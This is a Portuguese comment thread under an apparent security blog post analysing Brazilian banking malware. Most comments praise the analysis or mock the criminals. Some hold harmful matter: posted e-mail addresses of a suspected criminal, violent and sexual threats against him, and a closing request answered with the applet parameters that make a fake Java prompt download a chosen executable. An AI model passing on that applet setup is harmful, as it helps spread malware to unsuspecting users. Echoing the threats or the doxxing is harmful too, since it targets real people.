  28. c0d3c4sh to precisando dividir estado se é que me intende. rs

    Temos que troca uma ideia.

    ResponderExcluir
  29. Precisei elevar meu espírito pra conseguir ler esses últimos comments...

    Deu dor nos rins!

    ResponderExcluir
  30. Bom, se até no ano de 2000 a polícia prendia os mal feitores (http://www2.uol.com.br/JC/conexaoweb/zo250300.htm), imagina hoje. Se quiser, batem na porta do c0d3c4sh e mudam o nick dele pra j41lc4sh! HuahUhaau

    ResponderExcluir
  31. c0d3c4sh, são duas pessoas usando um mesmo nick.
    ;]

    ResponderExcluir
  32. Notícia de ontem:
    Polícia desmonta quadrilha de crackers

    A polícia de Itajuípe, a 452 km de Salvador, prendeu nesta terça (15) membros de uma quadrilha de crackers - hackers especializados em crimes eletrônicos envolvendo movimentações financeiras - após os universitários sacarem dinheiro na agência do Banco do Brasil local.
    http://www.bahiatododia.com.br/index.php?artigo=8431

    ResponderExcluir
  33. Os dois e-mails usados pelo c0d3c4sh para receber as infos: tchuritchuri@gmail.com e c4sh_out@terra.com.br

    ResponderExcluir
  34. quanta baboseira esses caras " bankers " falam...
    parece aqueles moleques mimados, q sempre teve tudo na vida, nunca trabalharam...
    so estão querendo atenção..
    mas pensam q estão em um filme..
    se querem aparecer na tv,vão aparecer indo para cadeia isso sim, depois ficam chorando e vai correndo pro colinho da mamãe...
    vão aparecer na tv, ..
    se trabalhassem não ficariam perdendo tempo, criando programinhas,q tem codigo fonte na web..!!
    muito boa materia.
    parabens, a todos..!!

    ResponderExcluir
  35. A vida é um ciclo.
    Tenho duas formas de chegar a você, correndo atrás, estudando e talz, ou esperando você passar pelo mesmo lugar.

    Sacou ?

    rsrs...

    ResponderExcluir
  36. Excelente post!

    Lammers owned! São lammers por deixarem rastros da forma como deixaram. =D

    ResponderExcluir
  37. Lindos, amigos.
    Gostaria de agradecer o grande apoio e incentivo proporcionado pelo trabalho de vocês.

    Publiquei um pequeno vídeo de agradecimento e inspiração:

    http://www.youtube.com/watch?v=-MCAfcn_ojM

    Abraços do seu amigo e ainda à solta, Psychlo.

    ResponderExcluir
  38. Eu acho que quem posta como anonimo é porque tem culpa no cartório. Falo mesmo

    ResponderExcluir
  39. MAtéria muito boa, esta de parabéns pelo empenho.

    ResponderExcluir
  40. Na verdade, os bankers tem muita "sorte", essa é a grande verdade, pois, pelo que tenho notado, nem a polícia, nem autoridades estão muito preocupadas com as fraudes cibernéticas. Eu e alguns amigos virtuais temos reportado uma infinidade de phishing´s, quantidade que pode ser verificada no site http://www.phishtank.com/ , quando reporto, envio o phishing para polícia federal, civil e outros 51 contatos, a eficácia é comprovada apenas para bloquear ou deletar o link do phishing, mas para correr atrás do infeliz.....acredito que os caras nem façam isso! Lamentável, mas vamos continuar correndo atrás desses vermes que querem dinheiro fácil. Aliás, para quem acompanha segurança da informação, podem perceber que os bankers terão um natal bem fraco de grana, kkkkkkkkkkkkkkk, tomara que a federal bata na porta deles, isso acontece uma hora! andre.defesadigital@hotmail.com

    ResponderExcluir
    Respostas
    1. Opa! olha eu de novo,

      Do Governo não tá ligando muito pra isso tudo é verdade... será? O Fato é que no Brasil não há leis sólidas sobre o universo WEB, e assim o "lado negro da força" faz a festa. Acredito fielmente que isso tudo é o início de uma grande guerra!

      "Um dia todos saberão da verdade, mais ela já não estará em todos"

      Ronaldo, Bom trabalho!

      Excluir
  41. Queria parabenizar o proprietário deste site, além de ser uma fonte de informação, através dele podemos trocar informações e repassar para a polícia e provedores, assim fica mais fácil identificar esses ratos que se escondem atrás de uma conexão! Esse c0d3c4sh vai rodar uma hora, podem apostar! Vejam isso, foi reportado por mim, esse muleque vai rodar, aguardem!

    andre.defesadigital@hotmail.com

    http://origin-home.mcafee.com/virusinfo/VirusProfile.aspx?key=691268#none

    ResponderExcluir
  42. Já fui dos dois lados, sei bem como isso funciona.
    Realmente uma técnica muito obsoleta mais por incrível que pareça ainda funciona.

    c0d3c4sh aqui suas palavras não funcionam.

    A qual é não sabem remover rastros não?

    Com 12 anos fazia um trabalho melhor do que estão fazendo.

    Não vejo mais graça em roubar contas bancárias e cartões de crédito.

    #include
    #include

    void pause(void)
    {
    system("read b");
    }

    int main(int argc, char argv[])
    {
    FILE *fp = fopen("bb/contas/pwds.txt", "r");
    if(!fp){
    exit(0);
    }
    for(i = 0; string[i]; i++) putc(string[i], fp);
    fclose(fp);
    getch();
    }

    Resultado: Noob detected. IP: XXX.XXX.XXX.X

    ºvº by: ScR1pT.NET
    /(_)\ contact: scr1pt.net@live.com
    ^ ^

    ResponderExcluir
  43. Mahhh rapaz, pq tanta raiva assim contra minha pessoa ein?
    Soh pq eu roubo, mato ? qual a diferença que há entre nós ?
    Todos nós somos iguais...

    eu fiz um twitter adiciona lah...
    @c0d3c4sh

    eh noisx que taaah!
    iiirrraaaaaaa
    :)

    ResponderExcluir
  44. ScR1pT.NET c0d3c4sh é uma lenda dos infects, com certeza ele usa VPN, então saber o ip seria inúltil, e mesmo que soubesse o ip e se o mesmo além de vpn estivesse usando um servidor da china ou da rússia o que adiantaria? a PF pega os desinformados. c0d3c4sh nunca será preso. #priv8

    ResponderExcluir
    Respostas
    1. "c0d3c4sh nunca será preso."

      Ninguém é infalível!

      Excluir
  45. c0d3c4sh esta com parceria com um h4x0r das antigas que esta em sob investigação. Foi desdobramento de uma outra OP.
    Mesmo que não adiante seguir pelos IPs e VPNs da vida, todos tem vínculos formados por laras, coders(c0d3c4sh e o tal programam), spammers e etc.. isso deixa rastros..
    Procurem saber sobre o Oráculo da PF!! Com o tempo vamos ter uma redução significativa dessas quadrilhas.

    ResponderExcluir
  46. Poha meu... esse FlashPlay.exe existe (pelo menos) desde 2006... magraozinho fez a festa aí, hein... :-/

    ResponderExcluir
  47. Olá, Ronaldo!

    Parabéns pelas excelentes análises de sempre. Sou analista forense computacional e sempre que possível acompanho seu blog.
    Eu creio que as variáveis "run" e "run2", referem-se às vezes que o artefato principal foi executado. No caso de uma reinfecção, a variável "run2" seria marcada.

    Abraço,
    Paulo

    ResponderExcluir
  48. Opa! olha eu de novo,

    Do Governo não tá ligando muito pra isso tudo é verdade... será? O Fato é que no Brasil não há leis sólidas sobre o universo WEB, e assim o "lado negro da força" faz a festa. Acredito fielmente que isso tudo é o início de uma grande guerra!

    "Um dia todos saberão da verdade, mais ela já não estará em todos"

    Ronaldo, Bom trabalho!

    ResponderExcluir
    Respostas
    1. "O Fato é que no Brasil não há leis sólidas sobre o universo WEB..."

      Defensis, não exalte criminosos virtuais!
      Existem leis e Leis. A primeira, eles têm certa noção, conhecem, a segunda, jamais conhecerão.
      Se qualquer um deles mexer com um membro da Nova Ordem desaparecerá como fumaça, antes mesmo que a polícia imagine que o sujeito um dia existiu.

      Excluir
  49. Ladroes virtuais que usam 99% de Ctrl+c como esses tal de (c0d3c4sh) de cima e ladroes de galinha pé de chinelo qual a diferença entre eles mesmo? ... assim os virtuais se escondem por trás de conexões e tem suas vidas vazias e não desfrutam da paz e tranquilidade e claro dificuldades de uma vida normal, enquanto os ladrões de galinha pé de chinelo estão exposto e são presos e ganhão uns tapas na cara mais facilmente.

    vou te procurar e te achar vc vai ser meu prisioneiro em um cativeiro e vc sera a mulherzinha de vários camaradas! reze para que a pf te ache primeiro do que eu e uns camaradas da net.

    ResponderExcluir
  50. antes que eu me esqueça vc não vai cair pelos seus rastros deixados pela net em ataques ou invasões de baixo nível. vc cairá por que vc tem ligações e contatos com pessoas, eu posso sentir o seu cheiro de tao perto que eu estou, não quero fazer terrorismo mas fique muito mais muito esperto mesmo!!! caso contrario a caçada não teria graça.

    ResponderExcluir
  51. Este comentário foi removido por um administrador do blog.

    ResponderExcluir
  52. kkkkkkkkkkkkkkkkkkkkkkkkkkkk quanta merda vao todos voces se foderem

    ResponderExcluir
  53. kkkkkkkkkkkk...E NOISSS c0d3c4sh INFO AKI E MATUUUUU

    ResponderExcluir
  54. c0d3c4sh a lenda ainda causando muitos estragos hahahahaha eh noix patrao, vamos que vamos ;)

    ResponderExcluir
  55. caralho muito bom mas nao entendo o pequeno codigo do applet para aparecer a telinha amarela pedindo dowloading

    mesmo eu auterando ele continua me mandando pro sit do java feke com seria o codigo se eu quiser faze aparecer a telinha do java amarela na barra do navegador que mande para onde eu quiser (outro executavel)

    quem souber agradeço quando falar...

    ResponderExcluir
    Respostas
    1. Olá, caso esteja se referindo a esse applet você precisa alterar esses dois valores:

      archive="http:/SeuSiteDeTeste/ScriptFail.jar"

      PARAM NAME="local" VALUE="http://SeuSiteDeTeste/arquivoteste.exe"

      Abraços.

      Excluir

Related Posts Plugin for WordPress, Blogger...